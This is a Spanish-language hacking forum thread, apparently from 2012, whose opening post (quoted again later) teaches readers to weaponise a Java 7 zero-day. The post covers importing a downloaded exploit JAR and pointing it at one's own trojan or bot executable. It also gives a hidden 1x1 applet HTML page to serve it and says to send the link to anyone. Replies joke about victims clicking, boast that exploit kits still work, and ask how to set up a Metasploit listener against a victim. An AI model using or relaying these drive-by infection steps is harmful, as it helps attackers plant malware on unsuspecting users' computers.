Explotando Java7 0day - Exploit .JAR

Iniciado por CalebBucker, Agosto 29, 2012, 09:57:59 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Agosto 29, 2012, 09:57:59 PM Ultima modificación: Septiembre 01, 2012, 12:19:16 PM por CalebBucker

Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
Pass: calebbucker

Necesitaremos el Programa Eclipse: 
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("No tienes permitido ver los links. Registrarse o Entrar a mi cuenta");


Ahora, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

Código: txt
<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>


En mi caso el codigo queda de la siguiente manera:

Código: txt
<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>



Esos archivos la subimos en nuestro Host el test.jar, index.html y applet1.class, de preferencia de pago.

Ahora solo queda enviar el link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(


Esta vulnerabilidad también puede ser explotada desde Metasploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

PARCHE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



muy bueno =) a ver quien es el wapo que le da clic a mi enlace =)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

XDDD


salu2

Es parecido a un Exploit Kit.

Debería salirte algo asi: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


El parche se encuentra disponible: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

De 10 personas solo 8 actualizaran.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Agosto 30, 2012, 07:31:39 PM #7 Ultima modificación: Agosto 30, 2012, 07:33:17 PM por Xt3mP
Cita de: hace 3 días


P.D.: El vídeo lo puse también para una demostración, es para complementar la información aquí presente.

Saludos.
Cada vez que me das Karma me motivas

Muy Buen Aporte  ;)

Gracias
____________________________

my best crime is myself

Ya salio la actualizacion obligatoria con el parche.
Hoy mismo se estaran actualizando todas las pc con java


Código: txt
Finalmente Oracle publicó ayer un parche que soluciona esta vulnerabilidad y otras tres más. Se ha conocido también que la vulnerabilidad CVE-2012-4681 fue reportada por Security Explorations hace cuatro meses. Esta misma empresa ha asegurado que la actualización de Oracle publicada ayer no cubre otras vulnerabilidades que reportaron en abril de este año.


Eso lo que dicen es cierto, porque desde hace ya un tiempo hasta ahora mis Exploit's Kit's siguen funcionando de maravillas, entonces eso quiere decir que Java NO tiene "parcheada" todas sus vulnerabilidades.

Cabe resaltar que la Vulnerabilidad 0day en Java7, aun sigue funcionando y funcionara siempre y cuando el usuario no actualize su Java.

Saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una duda con respecto a metasploit el funcionamiento seria así: ejecuto metasploit con mi ip publica algo como 209.55.102.3 y ejecuto el exploit con esa ip, si todo va bien se inicia el servidor con la siguiente url  209.55.102.3:4444 y esa es la url que le debo enviar a la victima, una ves que el haga clic activa la conexión con mi exploit que esta en escucha  y como resultado daría una session en el metasploit, creo  que esos son los pasos a seguir o se requiere de algo adicional

Saludos  ;) 

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Investigadores de seguridad de FireEye han informado de una nueva vulnerabilidad de día cero en Java que está siendo explotada activamente en Internet. Los runtime más recientes (JRE 1.7x) son también vulnerables.

Esta noticia e información esta siendo propagada por todos los Foros, Blogs de Seguridad, Redes Sociales, etc... pero solo informan de que "trata" oh como prevenirlo.

En este caso, les enseñare como aprovecharse de esta vulnerabilidad, mediante el Exploit en .JAR que ha sido compilado para explotar dicha vulnerabilidad.

Empecemos.

Descargamos el Exploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta 
Pass: calebbucker

Necesitaremos el Programa Eclipse: 
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Disponible 32 y 64 bits, descargue dependiendo de su S.O

Instalamos JAVA 7: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Iniciamos Eclipse, seleccionamos File - Import:


Seleccionamos General - Proyectos Existentes en el Área de Trabajo:


Le damos Next, ahora click en Browser y seleccionamos la ruta del exploit descomprimido, en mi caso es C:\Documents and Settings\TioSam\Escritorio\exploit2


Seleccionamos Finish, ahora en el proyecto importado, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y editamos la linea URL website = new URL("DOWNLOADPATH"); en DOWNLOADPATCH colocaremos la url de nuestro exe (bot, troyano) la cual quedaria: URL website = new URL("No tienes permitido ver los links. Registrarse o Entrar a mi cuenta");


Ahora, abrimos el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y le damos RUN, si el archivo logra abrir entonces quiere decir que todo funciona bien; si no abre compruebe que tiene JAVA 7 instalado.


Ahora, exportamos el Proyecto, click derecho sobre exploit2 y seleccionamos Export:


El proyecto tiene que ser guardado en formato JAR, por lo tanto seleccionamos Java - Jar file:


Seleccionamos Next, ahora click en Browser y seleccionamos la carpeta donde se guardara el archivo Jar en mi caso es: C:\Documents and Settings\TioSam\Escritorio\TEST\test.jar


Terminado ese paso le damos Next, Next y Finish.

Ahora, creamos un archivo html con el siguiente código:

Código: txt
<html><head></head><body><applet archive="JARNOMBRE.jar" code="applet1.class" width="1" height="1"></applet></body></html>


En mi caso el codigo queda de la siguiente manera:

Código: txt
<html><head></head><body><applet archive="test.jar" code="applet1.class" width="1" height="1"></applet></body></html>



Esos archivos la subimos en nuestro Host, de preferencia de pago.

Ahora solo queda enviar el link: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta a cualquier persona.

En este caso, he configurado una Botnet (Aldi) la cual al momento que abri dicho link quede infectado :(


Esta vulnerabilidad también puede ser explotada desde Metasploit:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Espero no sean tan "ingenuos" en abrir cualquier link que le envian, por lo menos tengan desactivado JAVA hasta que salga el respectivo parche.

Saludos.

PARCHE: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Alguien tiene el java vulnerable? ya no lo encuentro para descargar y testear